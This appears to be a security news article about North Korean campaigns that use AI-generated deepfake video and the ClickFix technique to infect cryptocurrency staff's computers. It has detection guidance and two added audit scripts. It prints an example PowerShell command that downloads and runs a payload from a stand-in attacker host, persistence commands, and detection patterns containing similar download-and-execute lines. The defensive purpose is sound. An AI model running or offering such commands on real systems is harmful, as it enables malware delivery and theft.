North Korea Deploys AI-Generated Video and ClickFix

North Korean threat actors are running sophisticated campaigns using AI-generated deepfake videos and the ClickFix social engineering technique to target...

Dylan H.

News Desk

February 11, 2026
6 min read

DPRK Combines AI and Social Engineering

North Korean state-sponsored threat actors are conducting highly targeted campaigns against the cryptocurrency sector using a sophisticated combination of AI-generated video content and the ClickFix social engineering technique to deliver malware payloads to both macOS and Windows systems.

This represents a significant evolution in North Korea's cyber operations, combining cutting-edge AI capabilities with proven social engineering tactics.


The ClickFix Technique Explained

What is ClickFix?

ClickFix is a social engineering technique that tricks victims into executing malicious commands by:

  1. Creating a fake error message (browser error, security warning, update notification)
  2. Providing "helpful" instructions to fix the non-existent problem
  3. Guiding victims to execute malicious code (PowerShell, terminal commands, scripts)

Example Attack Flow

1. Victim receives realistic-looking error:
   "Browser Security Certificate Expired"

2. Pop-up provides "solution":
   "To fix this issue, press Win+R and paste this command:"

3. Malicious PowerShell command:
   powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker[.]com/payload')"

The technique is devastatingly effective because:

  • Victims execute commands themselves (bypasses security warnings)
  • No traditional malware delivery (no file downloads initially)
  • Leverages trust in "official" error messages
  • Works across operating systems

AI-Generated Video Component

Deepfake Social Engineering

North Korean operators are creating:

Fake Video Calls:

  • AI-generated "recruiters" for cryptocurrency companies
  • Deepfake executives conducting "security briefings"
  • Synthetic "IT support" personnel requesting access

Pre-recorded Content:

  • Tutorial videos with malicious instructions
  • "Security update" announcements from fake vendors
  • "Urgent patches" for cryptocurrency wallets

AI Video Characteristics

Modern AI video generation allows attackers to create:

  • ✅ Realistic lip-sync and facial movements
  • ✅ Convincing voice synthesis
  • ✅ Appropriate business attire and backgrounds
  • ✅ Multi-language support
  • ✅ Real-time interactive capabilities (in some cases)

Target Profile: Cryptocurrency Sector

Why Cryptocurrency?

North Korean cyber operations have consistently targeted the cryptocurrency sector for:

  1. Financial motivation: Direct theft of digital assets
  2. Sanctions evasion: Converting stolen crypto to cash
  3. Funding operations: Supporting nuclear and missile programs
  4. Lower traceability: Harder to recover than traditional banking theft

Historical Context

Previous DPRK Cryptocurrency Operations:

  • 2022-2024: Lazarus Group stole $3+ billion in crypto
  • 2025: Increased focus on DeFi protocols and bridges
  • 2026: AI-enhanced social engineering campaigns

Targeted Organizations

  • Cryptocurrency exchanges
  • DeFi protocol developers
  • Blockchain security firms
  • Cryptocurrency wallet providers
  • NFT marketplaces
  • Crypto venture capital firms

Multi-Platform Malware Delivery

macOS Targeting

Delivery mechanisms:

  • Trojanized cryptocurrency applications
  • Fake software updates for legitimate wallets
  • Malicious browser extensions
  • Xcode project files with embedded backdoors

macOS-specific payloads:

# Example persistence mechanism
~/Library/LaunchAgents/com.apple.update.plist
 
# Hidden directory for malware
~/.local/share/system-updates/

Windows Targeting

Delivery mechanisms:

  • Malicious npm packages for crypto developers
  • Infected Python cryptocurrency libraries
  • Trojanized trading bots and automation tools
  • Fake job applications with embedded malware

Windows-specific payloads:

# Registry persistence
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
 
# Scheduled tasks
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\update.exe"

Campaign Tactics, Techniques, and Procedures (TTPs)

Initial Access

Technique               Description
Job Offers              Fake recruitment for cryptocurrency positions
Partnership Proposals   Business collaboration offers to crypto startups
Technical Support       Impersonation of wallet/exchange support teams
Security Alerts         Fake breach notifications requiring "immediate action"

Execution Chain

1. AI Video Call → Establish trust
2. ClickFix Error → Create urgency
3. Command Execution → Initial payload
4. Persistence → Scheduled tasks/LaunchAgents
5. C2 Connection → Establish communication
6. Lateral Movement → Network reconnaissance
7. Objective → Steal private keys, credentials, funds

MITRE ATT&CK Mapping

  • T1566: Phishing (video-based social engineering)
  • T1204: User Execution (ClickFix technique)
  • T1059: Command and Scripting Interpreter
  • T1053: Scheduled Task/Job
  • T1555: Credentials from Password Stores
  • T1552: Unsecured Credentials (crypto wallet keys)

Detection and Prevention

User Training

🎓 Educate employees about:

  • AI-generated video deepfakes (subtle artifacts, unusual behavior)
  • ClickFix social engineering (never paste unknown commands)
  • Verification procedures (callback to known contacts)
  • Cryptocurrency security best practices

Technical Controls

Endpoint Protection:

# Restrict script execution for the current user
# (execution policy is not a security boundary: it does not stop inline
#  "-c"/IEX one-liners like the ClickFix example above, so pair it with logging)
Set-ExecutionPolicy Restricted -Scope CurrentUser
 
# Monitor for suspicious terminal commands
# Enable PowerShell script block logging (Event ID 4104 in the
# Microsoft-Windows-PowerShell/Operational log) so pasted commands are recorded

macOS Security:

# Enable Gatekeeper (recent macOS releases deprecate this flag in favour of --global-enable)
sudo spctl --master-enable
 
# Verify code signatures
codesign -dv --verbose=4 /path/to/application
 
# Monitor LaunchAgents
ls -la ~/Library/LaunchAgents/
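Listing the LaunchAgents folder only shows file names; the traits that matter are inside the plists. The script below is an added example (not code from the article or from CosmicBytez Labs) that parses LaunchAgent property lists and flags the traits the article describes: an Apple-looking label in the user-writable LaunchAgents folder, a program under a hidden home-directory path such as ~/.local/share, a network fetch in the command, and a RunAtLoad/KeepAlive pair. The home directory and both plist contents are constructed for illustration; `scan_directory` is the hypothetical entry point you would run against a real host.

```python
"""Audit LaunchAgent plists for ClickFix-style persistence traits (added example)."""
import os
import plistlib
import re

HOME = "/Users/analyst"  # assumed home directory for the constructed samples

# Constructed samples: path -> plist bytes (one suspicious, one benign-looking)
SAMPLE_AGENTS = {
    f"{HOME}/Library/LaunchAgents/com.apple.update.plist": plistlib.dumps({
        "Label": "com.apple.update",
        "ProgramArguments": [
            "/bin/sh", "-c",
            f"curl -fsSL http://updates.invalid/a | sh; {HOME}/.local/share/system-updates/agent",
        ],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
    f"{HOME}/Library/LaunchAgents/com.docker.helper.plist": plistlib.dumps({
        "Label": "com.docker.helper",
        "ProgramArguments": ["/Applications/Docker.app/Contents/MacOS/com.docker.helper"],
        "RunAtLoad": True,
    }),
}


def audit_agent(path: str, data: bytes) -> list:
    """Return the suspicious traits found in one LaunchAgent plist, in check order."""
    plist = plistlib.loads(data)
    reasons = []
    label = str(plist.get("Label", ""))
    args = plist.get("ProgramArguments", [])
    program = " ".join(args) or str(plist.get("Program", ""))

    # Apple's own agents live under /System/Library/LaunchAgents, not in a user-writable folder
    if label.startswith("com.apple.") and "/Library/LaunchAgents/" in path and not path.startswith("/System/"):
        reasons.append("apple_label_in_user_agents")
    # A dot-directory component (e.g. /.local/) in the command path
    if re.search(r"/\.[A-Za-z0-9_-]+/", program):
        reasons.append("hidden_directory_program")
    # The agent itself downloads something at launch
    if re.search(r"\b(curl|wget)\b|https?://", program):
        reasons.append("network_fetch_in_command")
    # Shell one-liner wrapper rather than a real binary
    if "/bin/sh" in program and "-c" in args:
        reasons.append("shell_one_liner")
    # Starts at login and is restarted if killed
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("runatload_keepalive")
    return reasons


def audit_all(agents: dict) -> dict:
    """Audit an in-memory {path: plist bytes} mapping (used for the constructed samples)."""
    return {path: audit_agent(path, data) for path, data in agents.items()}


def scan_directory(directory: str) -> dict:
    """Read every .plist in a real LaunchAgents directory and audit it."""
    results = {}
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            path = os.path.join(directory, name)
            with open(path, "rb") as fh:
                results[path] = audit_agent(path, fh.read())
    return results


if __name__ == "__main__":
    for path, reasons in audit_all(SAMPLE_AGENTS).items():
        print(path, "->", reasons or "clean")
```

Run `scan_directory(os.path.expanduser("~/Library/LaunchAgents"))` on a host to audit real agents; the per-trait reasons make it easy to tune which combination should page an analyst rather than just one hit.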

Network Monitoring:

  • Monitor for connections to known DPRK infrastructure
  • Block cryptocurrency-related domains on non-approved systems
  • Implement DNS filtering for malicious domains

Application Security

For cryptocurrency organizations:

  • ✅ Hardware security keys for all authentication
  • ✅ Multi-signature wallets (no single points of failure)
  • ✅ Cold storage for majority of assets
  • ✅ Regular security audits of all code
  • ✅ Strict code signing and verification processes

Indicators of Compromise (IoCs)

Behavioral Indicators

  • Unsolicited job offers from cryptocurrency companies
  • Requests to execute terminal/PowerShell commands
  • Video calls with unusual video quality or artifacts
  • Urgent "security updates" outside normal channels
  • Requests for cryptocurrency wallet access or credentials

Technical Indicators

# Monitor for suspicious process execution
- powershell.exe with -encodedCommand flag
- osascript executing downloaded content
- curl/wget downloading from unusual domains
- Unusual LaunchAgents or scheduled tasks
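The indicators above map directly onto process-creation telemetry. The script below is an added example (not code from the article or from CosmicBytez Labs) that turns them into rules run over process-creation records in a simple constructed `parent|image|commandline` format: encoded or hidden-window PowerShell, download cradles, osascript fetching remote content, curl/wget to hosts outside an allowlist, and a scheduled task pointing at a binary in a Temp folder. The sample log lines, the `.invalid` hostnames and the `APPROVED_DOMAINS` allowlist are all constructed for illustration.

```python
"""Flag ClickFix-style process executions in constructed process-creation logs (added example)."""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    line: str


# Constructed sample records: parent process | image | command line
SAMPLE_LOG = """\
explorer.exe|powershell.exe|powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.invalid/payload')"
explorer.exe|powershell.exe|powershell.exe -encodedCommand SQBFAFgA
svchost.exe|powershell.exe|powershell.exe -File C:\\Scripts\\backup.ps1
Terminal|osascript|osascript -e 'do shell script "curl -fsSL http://updates.invalid/x.sh | sh"'
Terminal|curl|curl -fsSL http://updates.invalid/installer.sh
Terminal|curl|curl https://api.github.com/repos
cmd.exe|schtasks.exe|schtasks /create /tn "SystemUpdate" /tr "C:\\Windows\\Temp\\update.exe"
"""

# Hypothetical allowlist: hosts developers are expected to download from
APPROVED_DOMAINS = {"api.github.com", "pypi.org", "registry.npmjs.org"}

# (rule name, pattern over the command line)
RULES = [
    ("powershell_encoded",
     re.compile(r"powershell(\.exe)?\s.*-(e|ec|enc|encodedcommand)\b", re.I)),
    ("powershell_download_cradle",
     re.compile(r"powershell.*(IEX|Invoke-Expression).*(DownloadString|Invoke-WebRequest|iwr)", re.I)),
    ("powershell_hidden_window",
     re.compile(r"powershell.*-w(indowstyle)?\s+hidden", re.I)),
    ("osascript_remote_fetch",
     re.compile(r"osascript.*(curl|wget|http)", re.I)),
    ("schtasks_temp_binary",
     re.compile(r"schtasks.*?/create.*?\\Temp\\", re.I)),
]

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def unapproved_download_hosts(cmdline: str) -> list:
    """Hosts fetched by curl/wget in this command that are not on the allowlist."""
    if not re.search(r"\b(curl|wget)\b", cmdline, re.I):
        return []
    return [h for h in URL_RE.findall(cmdline) if h.lower() not in APPROVED_DOMAINS]


def triage(log_text: str) -> list:
    """Apply every rule to every record; one Finding per (rule, record) hit."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _parent, _image, cmdline = line.split("|", 2)
        for name, pattern in RULES:
            if pattern.search(cmdline):
                findings.append(Finding(name, line))
        for host in unapproved_download_hosts(cmdline):
            findings.append(Finding(f"download_from_unapproved_domain:{host}", line))
    return findings


def rule_names(findings: list) -> list:
    """Distinct rule names that fired, sorted for stable reporting."""
    return sorted({f.rule for f in findings})


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.rule}] {f.line}")
```

The benign `-File backup.ps1` and the allowlisted GitHub download produce no findings, which is the point of keeping an allowlist next to the pattern rules: the same curl that is normal for a developer is an indicator when its destination is not one the organisation expects.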

Industry Response

Cryptocurrency Sector

Leading exchanges and platforms are:

  • Implementing enhanced employee training programs
  • Deploying deepfake detection tools for video calls
  • Requiring in-person verification for sensitive operations
  • Enhancing code review processes for all dependencies

Government Action

  • US Treasury: Updated DPRK cyber threat advisories
  • FBI: Issued warnings to cryptocurrency companies
  • CISA: Released guidance on ClickFix techniques
  • International cooperation: Enhanced intelligence sharing

Recommendations

For Cryptocurrency Organizations

🔒 Implement multi-layered security:

  • Zero-trust architecture for all systems
  • Hardware security keys mandatory
  • Video call verification protocols
  • Code signing and supply chain security
  • Regular penetration testing
  • Incident response planning specific to crypto theft

For Individuals

🛡️ Protect your crypto assets:

  • Never execute commands from unknown sources
  • Verify video calls through secondary channels
  • Use hardware wallets for significant holdings
  • Enable all available security features
  • Regularly review account access logs
  • Be skeptical of unsolicited contact

Conclusion

The combination of AI-generated video and ClickFix social engineering represents a sophisticated evolution in North Korean cyber operations. The cryptocurrency sector must adapt its security posture to address these advanced threats.

Key Takeaway: Human verification and security awareness remain critical defenses against even the most advanced AI-powered attacks. When in doubt, verify through known, trusted channels.

The threat is real, sophisticated, and financially motivated—but it can be defended against with proper awareness and security controls.
